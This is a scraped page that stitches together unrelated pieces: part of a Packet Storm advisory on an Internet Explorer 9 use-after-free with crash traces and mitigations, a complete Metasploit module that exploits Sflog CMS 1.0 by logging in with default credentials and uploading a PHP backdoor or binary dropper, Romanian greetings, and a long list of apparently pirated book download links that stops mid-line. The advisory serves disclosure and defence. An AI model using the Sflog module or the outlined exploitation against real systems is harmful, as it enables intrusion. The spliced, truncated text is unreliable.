CTreePos allocated earlier) before control entered the MessageBox call and became stuck. Now, if a window message-mediated event results in the execution of Javascript that modifies or destroys those heap objects, corruption manifesting as a use-after-free, for instance, may result. As belabored in the Vulnerability Details section, not every type of event can be "stacked" in every situation like this, but certain different events can. An 0x8003 window message (for "body.onfocus") was being processed during the bottom message loop, so if an 0x8002 window message is posted, it will be processed during the top message loop--and this is exactly what the example has arranged to happen. Once the delay in serving "slow.js" elapses, an 0x8002 window message-mediated event (referred to as a "method call") corresponding to the concluded download will be posted and subsequently processed during the top message loop. This method call executes the created script element's "onreadystatechange" event handler, which destroys the very "div" element that was in the process of being rendered when Internet Explorer attempted to download the font and became stuck at the message box. The following partial call stack shows "removeChild" being called from the "onreadystatechange" event handler: 6d2eb4e3 MSHTML!CElement::ie9_removeChild 6d0084d6 MSHTML!CFastDOM::CNode::Trampoline_removeChild+0x7b 6d0cc04d JSCRIPT9!Js::JavascriptFunction::CallFunction+0xc4 039501af JSCRIPT9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x117 6d0084d6 0x39501af 6d0083fb JSCRIPT9!Js::JavascriptFunction::CallFunction+0xc4 6d008332 JSCRIPT9!Js::JavascriptFunction::CallRootFunction+0xb6 6d0082be JSCRIPT9!ScriptSite::CallRootFunction+0x4f 6d0cf12c JSCRIPT9!ScriptSite::Execute+0x63 6d4f24d1 JSCRIPT9!ScriptEngine::Execute+0x11a 6d4f23fb MSHTML!CListenerDispatch::InvokeVar+0x12a 6d35a726 MSHTML!CListenerDispatch::Invoke+0x40 6d5db834 MSHTML!CEventMgr::Dispatch+0x537 6d4a5607 MSHTML!CEventMgr::DispatchEvent+0xc9 6d4a02ff MSHTML!CElement::Fire_onreadystatechange+0x99 6d5a9d09 MSHTML!CScriptElement::FireOnReadyStateChange+0x3e 6d5c9368 MSHTML!GlobalWndOnMethodCall+0x115 7748c4e7 MSHTML!GlobalWndProc+0x302 7748c5e7 USER32!InternalCallWinProc+0x23 7748cc19 USER32!UserCallWinProcCheckWow+0x14b 7748cc70 USER32!DispatchMessageWorker+0x35e 774a38d7 USER32!DispatchMessageW+0xf 774a3b27 USER32!DialogBox2+0x15a 774ce0d5 USER32!InternalDialogBox+0xcb 774ce659 USER32!SoftModalMessageBox+0x68a 774ce78c USER32!MessageBoxWorker+0x2ca 774cea08 USER32!MessageBoxTimeoutW+0x7f 6ea15e86 USER32!MessageBoxExW+0x1b 774ceaa4 IEFRAME!Detour_MessageBoxExW+0x47 6db3ac94 USER32!MessageBoxW+0x45 6db3aaf1 MSHTML!CMailtoProtocol::DisplayMailClientNotFoundError+0x10b 6db3a2cc MSHTML!CMailtoProtocol::RunMailClient+0x12e 6db39def MSHTML!CMailtoProtocol::ParseAndBind+0x8b 76ab1c0b MSHTML!CMailtoProtocol::Start+0xcd ... The free actually happens in a subsequent method call, which is also processing during the MessageBox message loop, as shown in the following partial call stack: 75c4c3d4 kernel32!HeapFree+0x00000014 6d5eebed MSHTML!CTreePos::Release+0x00000046 6d5fdc69 MSHTML!CLayoutBlock::~CLayoutBlock+0x000000ba 6d5ff5da MSHTML!CFlexBoxBlock::`scalar deleting destructor'+0x00000013 6d559ee9 MSHTML!TSmartPointer<CPtsPelParaclient>::~TSmartPointer<CPtsPelParaclient>+0x00000014 6d5da773 MSHTML!HtmlLayout::SmartDispClient::Release+0x00000023 6d5da5fb MSHTML!HtmlLayout::FlowBox::ImplicitDestructor+0x0000001d 6d490144 MSHTML!HtmlLayout::CIE9DocumentLayout::FormatPage+0x00000065 6d48c517 MSHTML!CCssDocumentLayout::FindOrFormatPage+0x00000272 6d4872fb MSHTML!CCssDocumentLayout::GetPage+0x00000964 6d48e06f MSHTML!CMarkupPageLayout::CalcSize+0x0000028c 6d48de82 MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0x00000101 6d48fba1 MSHTML!CMarkupPageLayout::DoLayout+0x00000056 6d47e65a MSHTML!CView::ExecuteLayoutTasks+0x00000034 6d476a85 MSHTML!CView::EnsureView+0x000003bf 6d498701 MSHTML!CView::EnsureViewCallback+0x000000b8 6d5a9d09 MSHTML!GlobalWndOnMethodCall+0x00000115 6d5c9368 MSHTML!GlobalWndProc+0x00000302 7748c4e7 USER32!InternalCallWinProc+0x00000023 7748c5e7 USER32!UserCallWinProcCheckWow+0x0000014b 7748cc19 USER32!DispatchMessageWorker+0x0000035e 7748cc70 USER32!DispatchMessageW+0x0000000f 774a38d7 USER32!DialogBox2+0x0000015a 774a3b27 USER32!InternalDialogBox+0x000000cb 774ce0d5 USER32!SoftModalMessageBox+0x0000068a 774ce659 USER32!MessageBoxWorker+0x000002ca 774ce78c USER32!MessageBoxTimeoutW+0x0000007f ... At this point, a fully developed exploit might use Javascript to reallocate and overwrite the memory formerly belonging to the now-freed CTreePos. For the sake of this walkthrough, it suffices to let page heap wipe the freed memory of the CTreePos with 0xF0. Finally, once the user closes the message box, execution of the interrupt font downloading and page rendering code continues, but the code fails to anticipate that the program state has changed during the MessageBox call. A pointer on the stack to the destroyed CTreePos is dereferenced, resulting in an access violation. The following register dump, disassembly, and call stack illustrate; notice that EBX points to stack memory from which a pointer to the destroyed CTreePos is taken: Access violation - code c0000005 (first chance) eax=005ba430 ebx=03b5c5c8 ecx=f0f0f0f0 edx=03b5c540 esi=00000000 edi=00557840 eip=6d47b5d7 esp=03b5c450 ebp=03b5c510 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 MSHTML!CElement::ComputeFormatsVirtual+0x1a64: 6d47b5d7 0fbf4120 movsx eax,word ptr [ecx+20h] ds:0023:f0f0f110=???? 6d47b5c5 8b03 mov eax,dword ptr [ebx] 6d47b5c7 8b8bd4000000 mov ecx,dword ptr [ebx+0D4h] 6d47b5cd 89442420 mov dword ptr [esp+20h],eax 6d47b5d1 894c242c mov dword ptr [esp+2Ch],ecx 6d47b5d5 8b08 mov ecx,dword ptr [eax] 6d47b5d7 0fbf4120 movsx eax,word ptr [ecx+20h] 6d47a5a3 MSHTML!CElement::ComputeFormatsVirtual+0x1a64 6d47a4d6 MSHTML!CElement::ComputeFormats+0xe1 6d47bd39 MSHTML!CTreeNode::ComputeFormats+0xba 6d482d33 MSHTML!CTreeNode::ComputeFormatsHelper+0x40 6d360862 MSHTML!CTreeNode::GetFancyFormat+0x32 6d2d910f MSHTML!CElement::UpdateFormats+0x426 6d4ce10f MSHTML!CControlledFormatter::Init+0xcc 6d47fa14 MSHTML!CElement::OnPropertyChangeInternal+0x3fa 6d49b76b MSHTML!CElement::OnPropertyChange+0x1b 6d2da8db MSHTML!BASICPROPPARAMS::SetStringProperty+0x36a 6d0084d6 MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_className+0x61 6d0cc04d JSCRIPT9!Js::JavascriptFunction::CallFunction+0xc4 6d0cc968 JSCRIPT9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x117 6d009a85 JSCRIPT9!Js::JavascriptOperators::SetProperty+0x8c 6d009a2c JSCRIPT9!Js::JavascriptOperators::OP_SetProperty+0x59 039507b8 JSCRIPT9!Js::JavascriptOperators::PatchPutValueNoLocalFastPath+0xbc 6d0084d6 0x39507b8 6d0083fb JSCRIPT9!Js::JavascriptFunction::CallFunction+0xc4 6d008332 JSCRIPT9!Js::JavascriptFunction::CallRootFunction+0xb6 6d0082be JSCRIPT9!ScriptSite::CallRootFunction+0x4f 6d0cf12c JSCRIPT9!ScriptSite::Execute+0x63 6d4f24d1 JSCRIPT9!ScriptEngine::Execute+0x11a 6d4f23fb MSHTML!CListenerDispatch::InvokeVar+0x12a 6d54ce40 MSHTML!CListenerDispatch::Invoke+0x40 6d44e624 MSHTML!CEventMgr::_InvokeListeners+0x187 6d54cf37 MSHTML!CEventMgr::_InvokeListenersOnWindow+0xcc 6d5db67d MSHTML!CEventMgr::Dispatch+0x3cc 6d53ba32 MSHTML!CEventMgr::DispatchFocusEvent+0x7d 6d5e6f74 MSHTML!COmWindowProxy::Fire_onfocus+0x84 6d5e6ff1 MSHTML!CAsyncEventQueue::DispatchAllEvents+0x7c 7748c4e7 MSHTML!GlobalWndProc+0x2ed 7748c5e7 USER32!InternalCallWinProc+0x23 7748cc19 USER32!UserCallWinProcCheckWow+0x14b 7748cc70 USER32!DispatchMessageWorker+0x35e 6e8e1b44 USER32!DispatchMessageW+0xf 6e901a16 IEFRAME!CTabWindow::_TabWindowThreadProc+0x722 759315b0 IEFRAME!LCIETab_ThreadProc+0x317 6e8efd5b IERTUTIL!CIsoScope::RegisterThread+0xab 75c4ed6c IEFRAME!Detour_DefWindowProcA+0x6c 773737f5 KERNEL32!BaseThreadInitThunk+0xe 773737c8 NTDLL!__RtlUserThreadStart+0x70 00000000 NTDLL!_RtlUserThreadStart+0x1b EXPLOITATION ------------ Exploitation of this vulnerability is typical for a basic use-after-free condition in Internet Explorer, in that the exploit: (1) creates an object on the heap, (2) causes the object to be freed while references to it persist elsewhere, (3) replaces the contents of the heap memory formerly occupied by the object with arbitrary data, and (4) causes Internet Explorer to access a stale reference to the freed object. In a prepared proof-of-concept EIP control exploit targeting Internet Explorer 9 (32-bit), these steps were accomplished by: including two nested, named "div" elements in the HTML; modifying the outer "div" element to destroy the inner "div" (while the mail client error message is on the screen); performing a typical heap spray to store known data at a known address; and creating a large number of CTreePos-size heap blocks containing specially crafted data to fill the hole left by the freed inner "div" element. The specially crafted data includes a substitute vtable pointer which references heap-sprayed data at a hard-coded address, another feature typical of such exploits. The only step that this exploit cannot accomplish entirely on its own is triggering Internet Explorer to access the stale inner "div" element reference--this access occurs only after the user dismisses the mail client error message. MITIGATION ---------- Setting the "Downloads" -> "Font download" security setting to "Disable" ("HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Internet Settings\Zones\<zone-identifier>" -> "1604": REG_DWORD = "3") prevents exploitation of this vulnerability using the present technique. Deleting, renaming, or denying read access to the "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\mailto" registry key (and "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\PROTOCOLS\Handler\mailto" as appropriate) also prevents exploitation using the present technique; however, after implementing the workaround, confirm that clicking a "mailto:" link in any zone does not display a message box. CONCLUSION ---------- This document presents a long-lived vulnerability in Internet Explorer which permits arbitrary code execution given default security settings. Although current exploitation involves a modest amount of user interaction and user notification in the form of a mail client error message, the message is not security-related, and the message box does not present the user with an option of aborting exploitation. Further research into the vulnerability might reveal other means of exploitation which may change the presented message or reduce or eliminate the need for user interaction. GREETINGS --------- www.thetomatopizza.com ^ The best pizza anywhere near DFW; required eating for locals and remotes. http://packetstormsecurity.org/files/116320/Internet-Explorer-Script-Interjection-Code-Execution.html

This Metasploit module exploits multiple design flaws in Sflog 1.0. By default, the CMS has a default admin credential of "admin:secret", which can be abused to access administrative features such as blogs management. Through the management interface, we can upload a backdoor that's accessible by any remote user, and then gain arbitrary code execution. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => "Sflog! CMS 1.0 Arbitrary File Upload Vulnerability", 'Description' => %q{ This module exploits multiple design flaws in Sflog 1.0. By default, the CMS has a default admin credential of "admin:secret", which can be abused to access administrative features such as blogs management. Through the management interface, we can upload a backdoor that's accessible by any remote user, and then gain arbitrary code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'dun', #Discovery, PoC 'sinn3r' #Metasploit ], 'References' => [ ['OSVDB', '83767'], ['EDB', '19626'] ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'ExitFunction' => "none" }, 'Platform' => ['linux', 'php'], 'Targets' => [ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ] ], 'Privileged' => false, 'DisclosureDate' => "Jul 06 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base directory to sflog!', '/sflog/']), OptString.new('USERNAME', [true, 'The username to login with', 'admin']), OptString.new('PASSWORD', [true, 'The password to login with', 'secret']) ], self.class) end def check target_uri.path << '/' if target_uri.path[-1,1] != '/' base = File.dirname("#{target_uri.path}.") res = send_request_raw({'uri'=>"#{base}/index.php"}) if not res return Exploit::CheckCode::Unknown elsif res and res.body =~ /\<input type\=\"hidden\" name\=\"sitesearch\" value\=\"www\.thebonnotgang\.com\/sflog/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end # # Embed our binary in PHP, and then extract/execute it on the host. # def get_write_exec_payload(fname, data) p = Rex::Text.encode_base64(generate_payload_exe) php = %Q| <?php $f = fopen("#{fname}", "wb"); fwrite($f, base64_decode("#{p}")); fclose($f); exec("chmod 777 #{fname}"); exec("#{fname}"); ?> | php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ') return php end def on_new_session(cli) if cli.type == "meterpreter" cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") end @clean_files.each do |f| print_status("#{@peer} - Removing: #{f}") begin if cli.type == 'meterpreter' cli.fs.file.rm(f) else cli.shell_command_token("rm #{f}") end rescue ::Exception => e print_error("#{@peer} - Unable to remove #{f}: #{e.message}") end end end # # login unfortunately is needed, because we need to make sure blogID is set, and the upload # script (uploadContent.inc.php) doesn't actually do that, even though we can access it # directly. # def do_login(base) res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}/admin/login.php", 'vars_post' => { 'userID' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] } }) if res and res.headers['Set-Cookie'] =~ /PHPSESSID/ and res.body !~ /\<i\>Access denied\!\<\/i\>/ return res.headers['Set-Cookie'] else return '' end end # # Upload our payload, and then execute it. # def upload_exec(cookie, base, php_fname, p) data = Rex::MIME::Message.new data.add_part('download', nil, nil, "form-data; name=\"blogID\"") data.add_part('7', nil, nil, "form-data; name=\"contentType\"") data.add_part('3000', nil, nil, "form-data; name=\"MAX_FILE_SIZE\"") data.add_part(p, 'text/plain', nil, "form-data; name=\"fileID\"; filename=\"#{php_fname}\"") # The app doesn't really like the extra "\r\n", so we need to remove the newline. post_data = data.to_s post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}/admin/manage.php", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'cookie' => cookie, 'headers' => { 'Referer' => "http://#{rhost}#{base}/admin/manage.php", 'Origin' => "http://#{rhost}" } }) if not res print_error("#{@peer} - No response from host") return end target_path = "#{base}/blogs/download/uploads/#{php_fname}" print_status("#{@peer} - Requesting '#{target_path}'...") res = send_request_raw({'uri'=>target_path}) if res and res.code == 404 print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}") return end handler end def exploit @peer = "#{rhost}:#{rport}" target_uri.path << '/' if target_uri.path[-1,1] != '/' base = File.dirname("#{target_uri.path}.") print_status("#{@peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") cookie = do_login(base) if cookie.empty? print_error("#{@peer} - Unable to login") return end php_fname = "#{Rex::Text.rand_text_alpha(5)}.php" @clean_files = [php_fname] case target['Platform'] when 'php' p = "<?php #{payload.encoded} ?>" when 'linux' bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin" @clean_files << bin_name bin = generate_payload_exe p = get_write_exec_payload("/tmp/#{bin_name}", bin) end upload_exec(cookie, base, php_fname, p) end end http://packetstormsecurity.org/files/116328/Sflog-CMS-1.0-Arbitrary-File-Upload.html

2 -3 saptamani dupa

La multi ani !!!

Download : Apress.Beginning.SQL.Server.2012.Administration.May.2012.epub download - 2shared Download : CSS_XHTML_JavaScript.pdf download - 2shared Download : Manual HTML5.pdf download - 2shared Download : PHP Advanced Ajax Architecture and Best Practices.pdf download - 2shared Download : http://www.2shared.com/file/dfoyzPZv/MSPress101MicrosoftVisualBasic.html Download : http://www.2shared.com/document/nqT1nb7s/OReillyXSLT2ndEditionJul2008.html Download : http://www.2shared.com/document/NZUUJrzy/Creat_Ecommerce_Site.html EDIT Download : http://www.2shared.com/document/CCm6MgmP/C_online.html Download : http://www.2shared.com/file/6thWtLzu/C3ecode20110520.html Download : http://www.2shared.com/document/NqOAJnuy/Java_Learning_to_programming_w.html Download : http://www.2shared.com/file/vnILc8ga/oopj.html Download : http://www.2shared.com/document/OyOtKDIy/php_reference_-_beginner_to_in.html Download : http://www.2shared.com/document/8vsMdixa/practical-php-testing.html EDIT Download : http://www.2shared.com/document/qwsmqIGJ/Pro_NET.html EDIT Abobe Flash / Photoshop : Download : http://www.2shared.com/document/ORCGzp11/Adobe_-_Photoshop_6_Bible.html Download : http://www.2shared.com/document/VRbnOyGj/Advanced_Photoshop_Techniques.html Download : http://www.2shared.com/document/NblJ961U/Flash_MX_-_actionscript_standa.html Download : http://www.2shared.com/document/W29YQ3j6/flash_mx2004_introduction.html Java : Download : http://www.2shared.com/document/zLlpg7aX/Java_language_-_Specification_.html Download : http://www.2shared.com/document/qmx0FlA3/AgilexMethodology.html Download : http://www.2shared.com/document/sd4aStT6/JavaGramGuide.html Download : http://www.2shared.com/document/6bHnVBq7/Java_for_the_Beginning_Program.html Download : http://www.2shared.com/document/oHYrgCbb/Mastering_-_JAVA.html http://alvinalexander.com/java/java_oo/java_oo.shtml Perl : Download : http://www.2shared.com/document/W_fkTP_A/First_stem_in_Perl.html Download : http://www.2shared.com/document/ZszAHUZN/Perl_-_Working_with_simple_val.html Download : http://www.2shared.com/document/yyV7daCa/Perl_-_lists_and_hashes.html Download : http://www.2shared.com/document/9uxaconG/Perl_-_Loops_and_deisions.html Download : http://www.2shared.com/document/eUn5MBl5/Perl_-_Regular_expression.html Download : http://www.2shared.com/document/h5mVz741/Perl_-_Files_and_data.html Download : http://www.2shared.com/document/doUwyTIv/Perl_-_Database.html Download : http://www.2shared.com/document/vem22Kkn/Perl_-_INDEX.html Download : http://www.2shared.com/document/XZbMrM2J/Perl_-_Introduction_to_CGI.html Download : http://www.2shared.com/document/FxWD6HeE/Perl_-_Modules.html Download : http://www.2shared.com/document/xgCg2Oon/Perl_-_Object_oriented.html Download : http://www.2shared.com/document/deNCMpe5/Perl_-_References.html Download : http://www.2shared.com/document/_shhP3-5/Perl_-_Running_and_debugging.html Download : http://www.2shared.com/document/8B4r7Jr-/Perl_-_Subroutines.html Download : http://www.2shared.com/document/qMdTTw4Q/Perl_-_The_world_of_perl.html Download : http://www.2shared.com/document/gUGL_DwF/Perl_A_-_Regular_expresion.html Download : http://www.2shared.com/document/2Jh7S3R6/Perl_B_-_Special_variables.html Download : http://www.2shared.com/document/IPRrUCbl/Perl_C_-_Function_references.html Download : http://www.2shared.com/document/p2QxH8Yh/Perl_D_-_Standard_modules.html Download : http://www.2shared.com/document/NvfkjN_X/Perl_E_-_command_line_referenc.html Download : http://www.2shared.com/document/ivB9Py8j/Perl_F_-_ASCII_character_set.html Download : http://www.2shared.com/document/Pnqa3jDD/Perl_G_-_Licenses.html Download : http://www.2shared.com/document/Lkan2vaD/Perl_H_-_Solutions_ti_exercise.html Pascal : Download : http://www.2shared.com/document/xK9djb-r/Pascal__Guida.html Download : http://www.2shared.com/document/upc2sMkK/StartProgUsingPascal.html C++ : Download : http://www.2shared.com/document/7pd1EwkN/C_Essentials.html Download : http://www.2shared.com/document/8uqBP3Z5/An_Overview_of_the_C_Programmi.html Download : http://www.2shared.com/file/c0MQqPNt/C__1.html Download : http://www.2shared.com/file/HFTD6AeU/CPPCourse.html Download : http://www.2shared.com/document/KYaD3qun/C1_online.html Download : http://www.2shared.com/document/48FbQunk/C2_online.html Download : http://www.2shared.com/document/KURAMRd5/C3_online.html Download : http://www.2shared.com/document/hDbccHnq/C4_online.html Download : http://www.2shared.com/document/VZ6QxVx1/C5_online.html Download : http://www.2shared.com/document/fOFVL04i/C6_online.html Download : http://www.2shared.com/document/QkxwDMYM/C7_online.html Download : http://www.2shared.com/document/KPee1b-C/C8_online.html Download : http://www.2shared.com/document/b6yk5M_T/C9_online.html Download : http://www.2shared.com/document/QSyZ22jT/C10.html Download : http://www.2shared.com/document/vCeTYriC/C11.html Download : http://www.2shared.com/document/GZOE3QuT/C12.html Download : http://www.2shared.com/document/wqbQ_Gxp/C13.html Download : http://www.2shared.com/document/RMUnuyGe/C14.html C++ Tutorials : Download : http://www.2shared.com/document/RbDhWjUB/tutorial_c.html Download : http://www.2shared.com/document/3g_uqIHJ/cunleashed.html View : http://www.glenmccl.com/tutor.htm View : http://www.softwaretrainingtutorials.com/c-plus-plus.php UML : Download : http://www.2shared.com/document/LifK9g2U/UMLProcess.html Download : http://www.2shared.com/document/jBmrXuXl/CommNetwork.html Download : http://www.2shared.com/document/WFOGKjLy/UML_-_A_Profile_for_Integratin.html Download : http://www.2shared.com/document/aUBdy2TL/UML_-_A_UML_Profile_for_Extern.html Download : http://www.2shared.com/document/opSvGAIN/UML_-_Building_a_UML_Profile_f.html All Visual Basic : Download : http://www.2shared.com/document/UsDWTg5Q/Visual_Basic_Programs.html Download : http://www.2shared.com/document/erjo8IGU/Class1.html Download : http://www.2shared.com/document/PuZ0Dn6w/Class2.html Download : http://www.2shared.com/document/3K9UbS4_/Class3.html Download : http://www.2shared.com/document/Tfv65L7D/Class4.html Download : http://www.2shared.com/document/25KZ25jD/Class5.html Download : http://www.2shared.com/document/KUL9dACG/Contents.html Download : http://www.2shared.com/document/k5ELwugf/StartHere.html 60+ Free programming books for C, C++, C# - http://itdiscover.com/links/free-c-c-sharp-c-plus-plus-books-online-programming Python : Download : http://www.2shared.com/document/5Fj98mSo/An_Introduction_to_Python.html Download : http://www.2shared.com/document/lwRCAfew/DesignPatternsInPython_ver01.html Download : http://www.2shared.com/document/FUgtqSHd/Python_-_Biginner.html Download : http://www.2shared.com/document/lJcun_XY/Python_-_Code_Breaker.html Download : http://www.2shared.com/document/Pl8fMzoz/Python_-_Making_games.html Download : http://www.2shared.com/document/uC9l75FE/Python.html Cyber psychology : Download : http://www.2shared.com/document/JQK48cRU/Cyber_-_Psychology_-_Modern_Co.html Download : http://www.2shared.com/document/nkFVJTyy/Cyber_-_Psychology_-_Modern_Co.html Download : http://www.2shared.com/document/zIiU5B49/Cyber_-_Psychology_-_Modern_Co.html Download : http://www.2shared.com/document/eUXLmwMI/Cyber_-_Psychology_-_Modern_Co.html Download : http://www.2shared.com/document/ApV3KXQy/Cyber_-_Psychology_-_Modern_Co.html Download : http://www.2shared.com/document/ri3-JNC4/Cyber_-_Psychology_-_Modern_Co.html Human psychology : Download : http://www.2shared.com/document/N7tPSoNQ/Psychilogy_-_A_Place_Called_Ze.html Download : http://www.2shared.com/document/W1LhlZEY/Psychology_-_10_great_ways_to_.html Download : http://www.2shared.com/document/9f6jpuFd/Psychology_-_All_Is_Mind.html Download : http://www.2shared.com/document/VtQLsqge/Psychology_-_Anxiety__Panic_At.html Download : http://www.2shared.com/document/ZiG0WbQB/Psychology_-_Assault_on_the_So.html Download : http://www.2shared.com/document/fAag0zUC/Psychology_-_Bens_Story_A_Chil.html Download : http://www.2shared.com/document/4yQXuqPe/Psychology_-_Body_Language_Sec.html Download : http://www.2shared.com/document/NjF8G9Rx/Psychology_-_Discover_the_Secr.html Download : http://www.2shared.com/document/dE7bLu9i/Psychology_-_Turning_dreams_in.html Electronica IT : Download : http://www.2shared.com/document/5mO2UJk7/Electronica_electrical-power__.html Download : http://www.2shared.com/document/5mO2UJk7/Electronica_electrical-power__.html Download : http://www.2shared.com/document/mCvBcVdW/Electronica_electrical-power__.html Download : http://www.2shared.com/document/eX2Cwhe1/Electronica_electrical-power__.html Download : http://www.2shared.com/document/anWnTvWA/Electronica_electrical-power__.html Download : http://www.2shared.com/document/cDecXA9R/Electronica_electrical-power__.html Download : http://www.2shared.com/document/Ce3NB3w2/Electronica_electrical-power__.html Download : http://www.2shared.com/document/Nz-Rq1Nt/Electronica_electrical-power__.html Download : http://www.2shared.com/document/Cz8hV0El/Electronica_electrical-power__.html Download : http://www.2shared.com/document/8ESmWaGl/Electronica_electrical-power__.html Download : http://www.2shared.com/document/-OyxYVc8/Electronica_electrical-power__.html Download : http://www.2shared.com/document/sn3syHHv/Electronica_electrical-power__.html Download : http://www.2shared.com/document/PvXl6Zp-/Electronica_electrical-power__.html Download : http://www.2shared.com/document/cOsOp4wd/Electronica_electrical-power__.html Download : http://www.2shared.com/document/7DMZmTPs/Electronica_electrical-power__.html Download : http://www.2shared.com/document/jj1t2Wbn/Electronica_electrical-power__.html Download : http://www.2shared.com/document/d2ixXLYB/Electronica_electrical-power__.html Download : http://www.2shared.com/document/L-FgJBE4/Electronica_electrical-power__.html Download : http://www.2shared.com/document/Gv7CycKL/Electronica_electrical-power__.html LINUX : Download : http://www.2shared.com/document/LAyjOkVP/GNU-Linux-Tools-Summary.html Download : http://www.2shared.com/document/mh5hZYES/Introduction_-_LINUX.html Download : http://www.2shared.com/file/ciwue6HG/LINUX_COMMANDS.html Download : http://www.2shared.com/document/DIIej99r/linux_starter_pack.html Download : http://www.2shared.com/document/VyaKN0vj/producingoss.html Download : http://www.2shared.com/document/2eICc9dq/ubuntupocketguide-v1-1.html Algorithms : Download : http://www.2shared.com/document/ZuunFjqx/Algorithms_and_Complexity.html Download : http://www.2shared.com/document/kr1FUXeB/Information_Theory_Inference_a.html ProgrammingGroundUp : Download : http://www.2shared.com/document/diGXBmzg/ProgrammingGroundUp-0-8.html Download : http://www.2shared.com/document/3bYi5a_n/ProgrammingGroundUp-0-9.html Download : http://www.2shared.com/document/plMx7TsE/ProgrammingGroundUp-1-0-booksi.html Interrupt list : Download : http://www.2shared.com/file/iGqKD41g/Interrupt_list.html The art of assembly language programming : Download : http://www.2shared.com/file/DLc5Te7k/The_art_of_assembly_language_p.html HTML & CSS : http://my.safaribooksonline.com/book/web-development/html/9781118206911/firstchapter In acest PDF gasiti exemple , carti cu aproapte toate limbajele de programare : Download : http://www.2shared.com/document/NVTEFFu3/books.html Videos : http://my.safaribooksonline.com/9780137045150 C++ : http://my.safaribooksonline.com/9780137045150 Visual studio 2010 : http://my.safaribooksonline.com/9780137045150 Proxy : Download : http://www.2shared.com/document/SfNmTB_6/0309102251.html Download : http://www.2shared.com/document/nhhETZZ6/Earnings_Magic_and_the_Unbalan.html Download : http://www.2shared.com/document/AAOdcina/Firewalls_-_Jumpstart_for_Netw.html New - Books for your personal develpment : Download : http://www.2shared.com/document/HnTcyVS1/career-secrets-exposed1__1_.html Download : http://www.2shared.com/document/jEpe8hT-/career-secrets-exposed1__2_.html Download : http://www.2shared.com/document/F1dXcviq/career-secrets-exposed1__3_.html Download : http://www.2shared.com/document/_x1qAraw/career-secrets-exposed1__4_.html Download : http://www.2shared.com/document/M_6dZcDS/career-secrets-exposed1__5_.html Download : http://www.2shared.com/document/bIvFC5Jw/career-secrets-exposed1__6_.html Download : http://www.2shared.com/document/NSx9_zBF/career-secrets-exposed1__7_.html Download : http://www.2shared.com/document/qnj9xwBL/career-secrets-exposed1__8_.html Download : http://www.2shared.com/document/5Lf5Dv6w/career-secrets-exposed1__9_.html Download : http://www.2shared.com/document/reTqupG0/career-secrets-exposed1__10_.html Download : http://www.2shared.com/document/zpP5wEkL/career-secrets-exposed1__11_.html Download : http://www.2shared.com/document/uRiXnw4I/career-secrets-exposed1__12_.html Download : http://www.2shared.com/document/GY7y_ssV/career-secrets-exposed1__13_.html Download : http://www.2shared.com/document/HijZv24K/career-secrets-exposed1__14_.html Download : http://www.2shared.com/document/8tqIhOub/career-secrets-exposed1__15_.html Download : http://www.2shared.com/document/oA2bPH8z/career-secrets-exposed1__16_.html Download : http://www.2shared.com/document/GKuHmzKs/career-secrets-exposed1__17_.html Download : http://www.2shared.com/document/Vw9aytS1/career-secrets-exposed1__18_.html Download : http://www.2shared.com/document/fnBH2AeT/career-secrets-exposed1__19_.html PowerPoint : Download : http://www.2shared.com/document/dCdR0SMm/powerpoint-2010-advanced.html Excel : Download : http://www.2shared.com/document/pT_03lz9/excel-2010-advanced.html Accounting : Download : http://www.2shared.com/document/EUlp0UVS/accounting-cycle-exercises-i.html Download : http://www.2shared.com/document/CoE-CJR2/accounting-cycle-exercises-ii.html Download : http://www.2shared.com/document/Zv8N961U/accounting-cycle-exercises-iii.html Download : http://www.2shared.com/document/A7312zjD/accounting-cycle-exercises-iv.html Download : http://www.2shared.com/document/3ToqJ_F4/basics-of-international-financ.html Download : http://www.2shared.com/document/DIDsqJGZ/berliner-balanced-scorecard.html Download : http://www.2shared.com/document/flOu6fbE/berliner-balanced-scorecard-cu.html Download : http://www.2shared.com/document/zgpPOpM5/budgeting-and-decision-making.html Download : http://www.2shared.com/document/yJ3TVzxB/budgeting-and-decision-making-.html Download : http://www.2shared.com/document/azw1Dr5w/budgeting-and-decision-making-.html Download : http://www.2shared.com/document/7OTQrN2Z/budgeting-and-decision-making-.html Download : http://www.2shared.com/document/11vMtHvu/corporate-valuation-and-takeov.html Download : http://www.2shared.com/document/Yk4L4zLD/corporate-valuation-and-takeov.html Download : http://www.2shared.com/document/Z2qmdaFa/current-assets.html Download : http://www.2shared.com/document/B3jgsEnK/current-assets-exercises-1.html Download : http://www.2shared.com/document/Y75ctQCK/current-assets-exercises-ii.html Download : http://www.2shared.com/document/HZpYXF47/current-assets-exercises-iii.html Download : http://www.2shared.com/document/skFsNJq5/current-assets-exercises-iv.html Download : 